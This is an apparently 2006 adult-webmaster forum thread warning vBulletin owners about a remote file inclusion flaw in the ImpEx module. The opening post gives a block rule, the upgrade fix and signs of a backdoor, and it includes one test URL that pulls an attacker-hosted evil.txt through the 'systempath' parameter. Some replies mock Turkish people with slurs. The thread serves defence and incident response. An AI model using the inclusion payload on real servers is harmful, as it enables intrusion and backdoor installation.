Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.

You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today!

If you have any problems with the registration process or your account login, please contact us.

Post New Thread Reply

Register GFY Rules Calendar
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >
Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed.

 
Thread Tools
Old 05-13-2006, 01:07 PM   #1
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
ALERT for all Forum owners running vBulletin.

SplitInfinity Here letting you know that....

There is a known Turkish hacker group targeting the adult industry.
The vBulletin ImpEX module contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to ImpExData.php not properly sanitizing user input supplied to the 'systempath' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

First, you should immediately block this class C:

ipchains -A input -j REJECT -s 85.107.191.0/24 -d 0/0 -p all

For some reason, they keep using the same ips. Lame hackers. :-)

I have tracked them down and done some stuff to stop them from what they
are doing.... however you should be warned that if you run vBulletin they
will be hitting you soon! So far they have taken out over 10,000 sites
as reported on securityfocus.

Vulnerability Classification:

* Remote/Network Access Required
* Input Manipulation
* Loss Of Integrity
* Exploit Available
* Verified
* Web Related

Products:

* vBulletin ImpEx Module 1.74 ( http://www.vbulletin.com/docs/html/impex )

Solution:

Upgrade to version 1.75 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes:

http://[target]/impex/ImpExData.php?systempath=http://[attacker]/evil.txt?

Where the hackers play...
http://www.sanalinfaz.com/forumm/sho...=6140#post6140

They will use the exploit to install mech, eggdrops, backdoors to your server and more. I list below some common places they plant their files....

Places to check:
/tmp
/var/tmp/
/var/tmp/ssh
/var/tmp/root
/var/tmp/

Look for a file simply named "a" it is a backdoor.
That list is NOT all inclusive as different groups will run different
root kits for the same exploit....

Look for hidden directories by hitting TAB.

Example:

ls -la
total 20
drwxr-xr-x 3 apache apache 4096 Apr 22 03:58
drwxrwxrwt 3 root root 4096 May 13 13:20 .
drwxr-xr-x 24 root root 4096 Jan 29 20:50 ..

Notice the seemingly empty one on top?
If it type: cd [TAB]

I get this:
cd \ /multi/

They used control characters to hide the name of the directory. It
becomes exposed when tab completion has a go at it. They basically
named the directory " " space... :-)

So, I cd into cd \ /multi/ and voila, all the rootkits and irc shit
they run is in there. :-)

total 1360
drwxr-xr-x 4 apache apache 4096 Apr 23 00:00 .
drwxr-xr-x 3 apache apache 4096 Apr 22 03:58 ..
-rw-r--r-- 1 apache apache 454 Apr 24 07:08 `2Skeletzi.seen
-rw-r--r-- 1 apache apache 143 Apr 24 07:08 `50Cent.seen
-rw-r--r-- 1 apache apache 647 Apr 24 07:08 `50Centz.seen
-rw-r--r-- 1 apache apache 887 Apr 24 07:08 `5OCentz.seen
-rwxr-xr-x 1 apache apache 12 Dec 26 01:51 acycmech
-rw-r--r-- 1 apache apache 1163 Apr 24 07:08 Adriana``.seen
-rw-r--r-- 1 apache apache 527 Apr 24 07:08 Alexandreta.seen
-rw-r--r-- 1 apache apache 712 Apr 24 07:08 Al`Quaida.seen
-rw-r--r-- 1 apache apache 452 Apr 24 07:08 A-Tentat`.seen
-rw-r--r-- 1 apache apache 435 Apr 24 07:08 Aurora.seen
-rw-r--r-- 1 apache apache 234 Apr 24 07:08 BadBoy^.seen
-rw-r--r-- 1 apache apache 276 Apr 24 07:08 BaxDeCd`ie.seen
-rw-r--r-- 1 apache apache 941 Apr 24 07:08 B`Nicolita.seen
-rw-r--r-- 1 apache apache 878 Apr 24 07:08 Boxe.seen
-rw-r--r-- 1 apache apache 363 Apr 24 07:08 BUG`Mafia.seen
-rw-r--r-- 1 apache apache 842 Apr 24 07:08 C0Sty.seen
-rw-r--r-- 1 apache apache 620 Apr 24 07:08 CaracalCity.seen
-rw-r--r-- 1 apache apache 799 Apr 24 07:08 caracalmwe.seen
-rw-r--r-- 1 apache apache 339 Apr 24 07:08 CaracalTown.seen
-rw-r--r-- 1 apache apache 1019 Apr 24 07:08 CartieruHCC.seen
-rw-r--r-- 1 apache apache 692 Apr 24 07:08 CartierulHCC.seen
-rw-r--r-- 1 apache apache 581 Apr 24 07:08 CartziDeJoc.seen


Etc....
the list goes on
SplitInfinity is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 01:11 PM   #2
$5 submissions
I help you SUCCEED
 
$5 submissions's Avatar
 
Industry Role:
Join Date: Nov 2003
Location: The Pearl of the Orient Seas
Posts: 32,195
Thanks for the heads up!
$5 submissions is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 01:13 PM   #3
loverboy
When it rains, it pours
 
Industry Role:
Join Date: May 2003
Posts: 20,609
darn Turkish hackers

they want my sig now?

loverboy is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 01:24 PM   #4
split_joel
Confirmed User
 
Join Date: Jan 2005
Posts: 2,270
hence proving my point chris is by far the whitest cracker here good find dude
__________________
E-mail marketing - Automation Scripting - IP Space
AIM: splitjoelp ICQ: 254759453 skype - splitjoelp 702-941-6465
split_joel is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 01:25 PM   #5
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
Thanks.

My opinion is that by sharing the info I find, I help secure everyone, not just my customers.

However, it does put my customers in a good place, dont it? :-)

Love ya all...
SplitInfinity is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 01:27 PM   #6
Andiz
Confirmed User
 
Andiz's Avatar
 
Join Date: Feb 2006
Posts: 2,594
Thank you very much!!
Andiz is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 01:45 PM   #7
CDSmith
Too lazy to set a custom title
 
CDSmith's Avatar
 
Industry Role:
Join Date: May 2001
Location: My network is hosted at TECHIEMEDIA.net ...Wait, you meant where am *I* located at? Oh... okay, I'm in Winnipeg, Canada. Oops. :)
Posts: 51,460
Bump, if only to piss off the turkish hackers.
__________________
Promote Wildmatch, ImLive, Sexier.com, and more!!

ALWAYS THE HIGHEST PAYOUTS: Big Bux/ImLive SIGNUP ON NOW!!!

Put some PUSSYCA$H in your pocket.
ICQ me at: 31024634
CDSmith is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 01:49 PM   #8
Spunky
I need a beer
 
Spunky's Avatar
 
Industry Role:
Join Date: Jun 2002
Location: ♠ Toiletville ♠
Posts: 133,947
Here's a bump for TD
__________________
Spunky is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 02:16 PM   #9
madawgz
8.8.8.8
 
madawgz's Avatar
 
Industry Role:
Join Date: Mar 2006
Location: Noordermarkt
Posts: 30,509
thanks for the update
__________________
TAEMDLRMSKRJIXMRLSMRJ.
madawgz is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 02:20 PM   #10
Tannerb
Registered User
 
Join Date: May 2006
Location: England
Posts: 19
Sounds like those Ottoman Empire hackers, they arenhahaha8217;t just hacking the adult industry its all western sites, propaganda saying u attack our homes blah blah we attack your websites
Tannerb is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 02:21 PM   #11
fusionx
Confirmed User
 
Industry Role:
Join Date: Nov 2003
Location: Olongapo City, Philippines
Posts: 4,618
will this hack work on windows servers?
fusionx is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 02:27 PM   #12
Manowar
jellyfish  
 
Join Date: Dec 2003
Posts: 71,528
thx for the headsup
Manowar is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 02:44 PM   #13
fusionx
Confirmed User
 
Industry Role:
Join Date: Nov 2003
Location: Olongapo City, Philippines
Posts: 4,618
Quote:
Originally Posted by -=LC=-
so you are only vulnerable if you have SO old a version

of vB, like older than version 1.7.5 ?

so is it anyone who's site has like ver 2.X.X or newer, this does not effect?

That's the vBulletin ImpEx Module version 1.74.

It's in vBulletin 3.5 (don't know what earlier versions it's also in or if they are susceptible).
fusionx is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 02:45 PM   #14
czarina
Webmaster Extraordinaire
 
czarina's Avatar
 
Industry Role:
Join Date: Jul 2002
Location: A beautiful beach...
Posts: 10,748
turkish people who don't like porn... hmm... is there anything they like, other than ugly women and hashish?
czarina is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 03:05 PM   #15
ladida
Confirmed User
 
ladida's Avatar
 
Join Date: Nov 2005
Posts: 2,167
Rofl. Good work. You're only like 3 months too late. All that was supposed to be hacked was already hacked by now.
__________________
agentGFY *at* gmail.com
ladida is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 03:08 PM   #16
JamesK2
Confirmed User
 
Join Date: Aug 2004
Location: The Netherlands
Posts: 6,589
going to work on that soon, thx for the heads u[
__________________
JamesK2 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 03:08 PM   #17
JamesK2
Confirmed User
 
Join Date: Aug 2004
Location: The Netherlands
Posts: 6,589
going to work on that soon, thx for the heads up
__________________
JamesK2 is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 03:22 PM   #18
Babaganoosh
♥♥♥ Likes Hugs ♥♥♥
 
Babaganoosh's Avatar
 
Industry Role:
Join Date: Nov 2001
Location: /home
Posts: 15,841
Nice geek detective work. I'm impressed.
__________________
I like pie.
Babaganoosh is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 03:29 PM   #19
woj
<&(©¿©)&>
 
woj's Avatar
 
Industry Role:
Join Date: Jul 2002
Location: Chicago
Posts: 47,882
with a properly secured server it should be impossible to own a site with this exploit...
__________________
Custom Software Development, email: woj#at#wojfun#.#com to discuss details or skype: wojl2000 or gchat: wojfun or telegram: wojl2000
Affiliate program tools: Hosted Galleries Manager Banner Manager Video Manager
Wordpress Affiliate Plugin Pic/Movie of the Day Fansign Generator Zip Manager
woj is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 05:41 PM   #20
elitetec
Too lazy to set a custom title
 
Join Date: Sep 2005
Location: New York
Posts: 4,944
just hell with turkish hacker, they even don't know english
__________________



Add Your Site To My PR4 Blog
Selling Sig ICQ-200636146
elitetec is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 06:19 PM   #21
minusonebit
So Fucking Banned
 
Join Date: Feb 2006
Posts: 7,391
Quote:
Originally Posted by fusionx
will this hack work on windows servers?
Even if it dosent, you can bet that 100s of others will.
minusonebit is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 06:20 PM   #22
dunefield
www.barely18movies.com
 
dunefield's Avatar
 
Join Date: Feb 2003
Location: Melbourne, Australia
Posts: 10,920
Cyber Jihad!!!
__________________
dunefield is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 07:15 PM   #23
SplitInfinity
Confirmed User
 
Join Date: Dec 2002
Location: San Diego, CA
Posts: 3,047
Woj, not everyone has a properly secured server because the programs they run have unknown exploits, that BECOME exploits after they are discovered.
SplitInfinity is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 07:25 PM   #24
Sparks
Confirmed User
 
Join Date: Nov 2004
Location: Southern CA
Posts: 2,466
Ah, Thanks for the heads up!
Sparks is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 07:26 PM   #25
sfera
Confirmed User
 
Join Date: Aug 2005
Location: ICQ: 248877409
Posts: 8,597
great heads up
sfera is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 08:37 PM   #26
bizarredollars
Confirmed User
 
Join Date: Mar 2006
Location: bizarredollars.com
Posts: 1,582
Thanks for the info!!
__________________

[email protected]
icq: 205-252-550
bizarredollars is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-13-2006, 08:43 PM   #27
Dagwolf
President of Canada
 
Dagwolf's Avatar
 
Join Date: Sep 2003
Location: Leaving Hell, Entering Limbo
Posts: 23,141

I want my GFY
Money for nothin'
and pics for free.
__________________
Sleep well, and dream of large women.

Dagwolf is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-14-2006, 04:04 PM   #28
split_joel
Confirmed User
 
Join Date: Jan 2005
Posts: 2,270
Quote:
Originally Posted by fusionx
will this hack work on windows servers?
im not sure if chris solution will work for ur windows server but yes the windows servers are just as much @ risk if not more
__________________
E-mail marketing - Automation Scripting - IP Space
AIM: splitjoelp ICQ: 254759453 skype - splitjoelp 702-941-6465
split_joel is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Old 05-14-2006, 04:06 PM   #29
MaddCaz
Confirmed User
 
Join Date: Mar 2006
Location: Illinois
Posts: 9,483
Thanks for heads up!
MaddCaz is offline   Share thread on Digg Share thread on Twitter Share thread on Reddit Share thread on Facebook Reply With Quote
Post New Thread Reply
Go Back   GoFuckYourself.com - Adult Webmaster Forum > >

Bookmarks



Advertising inquiries - marketing at gfy dot com

Contact Admin - Advertise - GFY Rules - Top

©2000-, AI Media Network Inc



Powered by vBulletin
Copyright © 2000- Jelsoft Enterprises Limited.